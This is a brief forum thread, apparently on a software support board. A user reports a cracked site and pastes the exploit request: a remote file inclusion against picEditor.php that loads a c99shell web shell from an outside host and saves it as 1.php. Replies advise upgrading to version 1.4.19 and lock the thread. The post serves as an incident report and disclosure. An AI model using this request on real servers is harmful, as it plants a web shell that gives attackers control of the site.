URGENTLY! Have cracked a site! A code example:
/picEditor.php?img_dir=http://xakforum.altnet.ru/tmp_upload/files/c99shell.txt&CURRENT_PIC[filename]=/1.php
The file version 1.4.16
try with 1.4.19 actual version. http://sourceforge.net/project/showfiles.php?group_id=89658
See the existing thread discussing this. Locking.